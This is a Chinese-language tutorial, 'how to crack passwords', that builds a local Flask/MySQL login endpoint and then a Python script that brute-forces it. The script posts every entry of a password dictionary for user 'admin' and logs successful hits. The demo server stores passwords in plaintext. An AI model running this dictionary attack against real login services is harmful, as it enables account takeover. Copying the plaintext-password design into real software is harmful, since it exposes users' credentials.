如何破解密码

from flask import Flask, request, jsonify
from flask_cors import CORS
import pymysql
 
app = Flask(__name__)
CORS(app)
 
# 填写相应的数据库信息，，，
ConSql = pymysql.connect(host='数据库地址',
                       user='账号',
                       password='密码',
                       db='数据库名称',
                       charset='utf8mb4',
                       cursorclass=pymysql.cursors.DictCursor)
 
@app.route('/login', methods=['POST'])
def login():
    username = request.json['username']
    password = request.json['password']
    with ConSql.cursor() as cursor:
        sql = "SELECT * FROM login WHERE username = %s AND password = %s"
        cursor.execute(sql, (username, password))
        result = cursor.fetchone()
        if result:
            return jsonify({'status': 'success', 'message': '登录成功'})
        else:
            return jsonify({'status': 'error', 'message': '用户名或密码错误'})
if __name__ == '__main__':
    app.run(debug=True)

第二步

 

 



    
    
    
    
    
    
    
    


    

        

            
python密码破解testPage
            
”
            

                用户名:
            
            

                密码:
            
            
            

                {{ test_status}}
            
            

                登录
            
        
    
    
    
 

到这里，程序基本完成，我们再完善一下。

import requests
import json
 
url = "http://127.0.0.1:5000/login"
'''
单次测试
先判断单独写上传点能否上传成功
可以的话，在写后面跑字典的操作
'''
data = {
    "username":"admin", 
    "password":"123456"
    }
 
'''
开始跑字典，查看是否可行。
'''
# 打开字典文件
with open('password.txt','r') as file:
    # 写一个新的数据提交，先把密码为空，后面将字典赋值给这里的密码
    datapwd = {
        "username":"admin", 
        "password":""
    }
    # 循环提交，正式跑字典
    for pwd in file:
        datapwd['password'] = pwd.strip()
        req = requests.post(url, json=datapwd,headers={"Content-Type":"application/json"})
        json_data = json.loads(req.text)
        # 当返回的json的status的值为success时候，单独输出在txt文件中
        if json_data['status'] == 'success':
            # print('password:'+datapwd["password"]+':\n',req.text)
            file = open('success.txt','a')
            file.write('password:'+datapwd["password"]+':\n'+req.text+'\n')
            file.close()
        # 输出返回结果
        print('password:'+datapwd["password"]+':\n',req.text)

到这就OK了！